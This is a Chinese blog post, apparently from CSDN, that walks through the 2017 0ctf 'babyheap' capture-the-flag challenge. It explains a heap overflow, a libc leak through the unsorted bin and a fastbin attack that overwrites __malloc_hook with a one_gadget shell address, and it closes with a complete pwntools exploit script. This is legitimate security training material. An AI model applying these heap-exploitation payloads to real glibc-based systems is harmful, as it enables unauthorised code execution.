2017 0ctf babyheap

最新推荐文章于 2025-03-18 22:03:50 发布
最新推荐文章于 2025-03-18 22:03:50 发布
阅读量218 收藏
点赞数
文章标签: 链表 安全 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69107736/article/details/129676510
版权

2017 0ctf babyheap

https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/fastbin-attack/2017_0ctf_babyheap

grxer@Ubuntu16:~/Desktop/pwn/heap$ checksec babyheap 
[*] '/home/grxer/Desktop/pwn/heap/babyheap'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

刚开始的init_my会利用/dev/urandom随机函数用mmap随机映射一块内存给我们存放指针,没有了确定地址,我们就不好去构成unlink攻击

allocate()根据我们输入的size构成如下一个结构体,把指针放在mmap的堆上

00000000 chunk           struc ; (sizeof=0x18, mappedto_6)
00000000 inuse           dq ?
00000008 size            dq ?
00000010 ptr             dq ?                    ; offset
00000018 chunk           ends

fill()也会根据我们的size进行读写,任意堆溢出,这就好办了

freechunk()挺好的,该置零的都置零

      LODWORD(a1[v2].inuse) = 0;
      a1[v2].size = 0LL;
      free(a1[v2].ptr);
      result = (__int64)&a1[v2];
      *(_QWORD *)(result + 16) = 0LL;

unsort bin泄露libc

allocate(0x10)  # idx 0, 0x00
allocate(0x10)  # idx 1, 0x20
allocate(0x10)  # idx 2, 0x40
allocate(0x10)  # idx 3, 0x60
allocate(0x80)  # idx 4, 0x80
free(2)
free(1)
payload = 0x10 * b'a' + p64(0) + p64(0x21) + p8(0x80)
fill(0, len(payload), payload)
payload = 0x10 * b'b' + p64(0) + p64(0x21)
fill(3, len(payload), payload)
allocate(0x10)
allocate(0x10)
payload = 0x10 * b'c' + p64(0) + p64(0x91)
fill(3, len(payload), payload)
allocate(0x80)
free(4)
# gdb.attach(io)
dump(2)

这里我们申请五个堆

在这里插入图片描述

我们free(2)free(1)后形成单链表

在这里插入图片描述

由于我们可以利用堆溢出chunk0去一改写chunk1,改写1的fd为,由于堆一般都是以4k对齐的,我们可以根据申请堆的大小猜测处chunk2和chunk4只有最后一个字节0x80的差距

payload = 0x10 * b'a' + p64(0) + p64(0x21) + p8(0x80)即可

在这里插入图片描述

这样我们申请两次就可以拿到chunk4,我们需要改写大小绕过fastbin0x20的检测

堆溢出chunk3即可payload = 0x10 * b'b' + p64(0) + p64(0x21)

allocate(0x10)
allocate(0x10)

把chunk2分配到chunk4数据区

这时候释放chunk4之前,要再申请一个堆防止unsorted bin的chunk4与topchunk合并,并把chunk4的大小溢出为0x91进入unsortedbin,输出chunk2就能拿到unsortbin地址

在这里插入图片描述

通过固定偏移找到libc基址

切割chunk malloc_hook

这个时候我们的chunk2是可以控制chunk4的data区,这就需要我们把chunk4丢到fastbin的链表中,实现任意地址malloc,但是chunk4现在再unsortbin的循环链表里

我们可以利用ptmalloc2特性当fastbin大小里没有合适大小的chunk,会去unsorted bin找合适大小的块或者切割合适大小的块

#include <stdio.h>
#include <stdlib.h>
int main(void) {
	void* x = malloc(0x80);
	malloc(0x10); //防止和topchunk合并
	free(x);
	void* y = malloc(0x60);
	
}
//gcc -g -o test test.c

malloc(0x10)

在这里插入图片描述

free(x)

在这里插入图片描述

void* y = malloc(0x60);

在这里插入图片描述

可以看到直接分割

在这里插入图片描述

0x7f我们需要伪造0x60大小chunk,直接一步达到要求

allocate(0x60) #idx4
free(4)

再把fakechunk写入

ake_chunk_addr = main_arena - 0x33
fake_chunk = p64(fake_chunk_addr)
fill(2, len(fake_chunk), fake_chunk)

在这里插入图片描述

allocate(0x60) # idx 4
allocate(0x60) # idx 6

得到chunk

0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

写入onegadget

one_gadget_addr = libc + 0x4526a
payload = 0x13 * b’a’ + p64(one_gadget_addr)
fill(6, len(payload), payload)

继续跑路

在这里插入图片描述

EXP

from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64')
pwnfile='./babyheap'
elf = ELF(pwnfile)
rop = ROP(pwnfile)
if args['REMOTE']:
    io = remote('node4.buuoj.cn','28529')
else:
    io = process(pwnfile)
r = lambda x: io.recv(x)
ra = lambda: io.recvall()
rl = lambda: io.recvline(keepends=True)
ru = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
ia = lambda: io.interactive()
c = lambda: io.close()
li = lambda x: log.info(x)
db = lambda x : gdb.attach(io,x)
p =lambda x,y:success(x+'-->'+hex(y))

def allocate(size):
    io.recvuntil(b'Command: ')
    io.sendline(b'1')
    io.recvuntil(b'Size: ')
    io.sendline(str(size).encode())


def fill(idx, size, content):
    io.recvuntil(b'Command: ')
    io.sendline(b'2')
    io.recvuntil(b'Index: ')
    io.sendline(str(idx).encode())
    io.recvuntil(b'Size: ')
    io.sendline(str(size).encode())
    io.recvuntil(b'Content: ')
    io.send(content)


def free(idx):
    io.recvuntil(b'Command: ')
    io.sendline(b'3')
    io.recvuntil(b'Index: ')
    io.sendline(str(idx).encode())


def dump(idx):
    io.recvuntil(b'Command: ')
    io.sendline(b'4')
    io.recvuntil(b'Index: ')
    io.sendline(str(idx).encode())
allocate(0x10)  # idx 0, 0x00
allocate(0x10)  # idx 1, 0x20
allocate(0x10)  # idx 2, 0x40
allocate(0x10)  # idx 3, 0x60
allocate(0x80)  # idx 4, 0x80
# gdb.attach(io)
free(2)
free(1)
# gdb.attach(io)
payload = 0x10 * b'a' + p64(0) + p64(0x21) + p8(0x80)
fill(0, len(payload), payload)
# gdb.attach(io)
payload = 0x10 * b'b' + p64(0) + p64(0x21)
fill(3, len(payload), payload)
allocate(0x10) #idx 1
allocate(0x10) #idx 2
payload = 0x10 * b'c' + p64(0) + p64(0x91)
fill(3, len(payload), payload)
allocate(0x80)# idx5
free(4)
# gdb.attach(io)
dump(2)
ru(b'Content: \n')
unsortbin_addr = u64(io.recv(8))
main_arena=unsortbin_addr-88
libc=main_arena-0x3C4B20
p('libc',libc)
allocate(0x60) #idx4
free(4)
# gdb.attach(io)
fake_chunk_addr = main_arena - 0x33
fake_chunk = p64(fake_chunk_addr)
fill(2, len(fake_chunk), fake_chunk)
allocate(0x60)  # idx 4
allocate(0x60)  # idx 6
one_gadget_addr = libc + 0x4526a
payload = 0x13 * b'a' + p64(one_gadget_addr)
fill(6, len(payload), payload)
gdb.attach(io)

allocate(0x100)
io.interactive()
Grxer
关注
【pwn】 0ctf_2017_babyheap
Nothing
12-11 685
例行检查 保护全开。 分析程序。在fill函数中存在溢出,通overlap,泄露libc。然后fastbin attack。 from pwn import * io=remote('node3.buuoj.cn',27627) libc=ELF('./libc-2.23.so') def add(size): io.recvuntil('Command: ') io.send...
[BUUCTF]-PWN:babyheap_0ctf_2017解析
2301_79326813的博客
01-10 1151
但是这里要解释一点,为什么不能直接释放堆块4,虽然这样堆块4也能进入unsortedbin里,但是要注意free堆块后指向堆块的指针将会被置零,大致意思就是free了之后,index4就不指向那个堆块了,这时候dump(4)就是无效的,虽然那个堆块里面有mainarena+88的地址,但dump(4)不会打印出里面的地址,所以我们要让两个堆块的指针指向同一个堆块,这样在释放掉一个堆块时还能用另一个指针利用该堆块。后面alloc(0x60)与这里的0x7f有关。
0ctf_2017_babyheap
u014377094的博客
03-10 541
本人double free+fastbin攻击第一道题,看了两天,好在理解下来不难。 参考传送门[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com 惯例checksec一下 打开ida 1创建chunk,按1,2依次创建,2往里写,3free掉指定数字chunk,4print出指定chunk内容 不建议跟ida里一些函数死磕,硬读会恶心到,理解就ok。 这里先放exp,读一遍exp咱们再来解释 from pwn import
BUUCTF Pwn babyheap_0ctf_2017 Unsorted bin attack部分
最新发布
qq_33348179的博客
03-18 191
可以在编辑堆的时候重新设置大小 存在堆溢出。delete函数的指针清零了 无UAF。开启了全保护 64位。
babyheap_0ctf_2017
m0sway的博客
11-25 701
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
BUUCTF-babyheap_0ctf_2017
Rt1Text的博客
11-27 800
标准堆菜单。
babyheap_0_ctf_2017
m0_48127441的博客
04-01 281
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
0ctf 2017 babyheap writeup
jmp esp
03-26 6502
前言坑比的我比赛的时候没有做。。第二天有课,赛后看了看,题目其实没啥太多难度,可能也就是细节上需要注意一下吧题目题目功能简单介绍一下题目功能,因为我本机是用的linux,ida在虚拟机里,ida的复制又不是特别方便,所以我就不复制分析的情况了,具体分析自己做一下练习一下也比较好,就把大致的情况说明一下。首先是主菜单===== Baby Heap in 2017 ===== 1. Allocate 2
0ctf Babyheap 2017
Bill
03-11 6597
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
【FastBinAttack实战】babyheap_0ctf_2017
Tokameine的博客
08-09 555
分析利用: 无壳,IDA打开后可以看出题目是基本的增删与展示(函数名为方便阅读而修改) __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char *v4; // [rsp+8h] [rbp-8h] v4 = initMmapList(); while ( 1 ) { Menu(); switch ( getInput() ) { case 1LL: ...
[BUUCTF]PWN——babyheap_0ctf_2017
has_zaoganmaqule的博客
07-17 647
这题目我是在ctfshow里面看到的,因为ctfshow给的wp真的太抽象了。所以我就搜了搜,找到了原题,但我看别人写的都不是很好。所以后面自己尝试pwn成功了。首先查看保护全开是吧!!!放神的武器ida里面看看main函数一眼,菜单题cadd函数就很正常,调用calloc函数来申请堆块。(calloc函数和malloc函数的区别就是是否进行初始化,虽然calloc初始化看着更安全点,但是性能特别慢,而且在实际环境中好多变量都不需要进行初始化)
[BUUCTF]PWN——0ctf_2017_babyheap
mcmuyanga的博客
01-11 691
0ctf_2017_babyheap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 main函数 add() edit() delete() show() 利用思路 edit存在堆溢出,可以通过重叠堆来泄露libc 然后利用fastbin attack,修改malloc_hook为one_gadget 利用过程 首先来构造重叠堆 先申请3个chunk, add(0x10)#0 add(0x10)#1 add(0x80)#2 来看一
BUUCTF:0ctf_2017_babyheap
weixin_51055545的博客
01-07 1671
一天一道buu 今天做了这道堆题没有想象的难,毕竟是道1分的题 例行检查 64位程序,保护机制全开的,放到IDA 漏洞分析 漏洞在edit()函数中,我们add()之后,在edit()时,能再次控制size的大小,存在堆溢出。 分析好漏洞后,就开始利用 利用思路和分析 1.我们先利用堆溢出泄露出libc地址 2.劫持fd指针到malloc_hook,覆盖malloc_hook为one_gadget,当再次申请堆块时调用one_gadget,从而get shell 分析 首先堆布局,申请0x100的堆,释放
【堆溢出】babyheap_0ctf_2017
huzai9527的博客
03-14 338
堆溢出 创建3个chunk 修改chunk1 head 将fake chunk 尾部造假的chunk head 释放chunk1 即fake chunk 再申请和fake chunk一样大小的chunk 还原chunk2 的头部 申请chunk3, 防止释放chunk2 后,合并到top chunk free chunk2 泄露main_area的地址 ​ 这里泄露的是main_arena+88 的地址 ​ 这里得到mian_arena的实际地址 ​
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值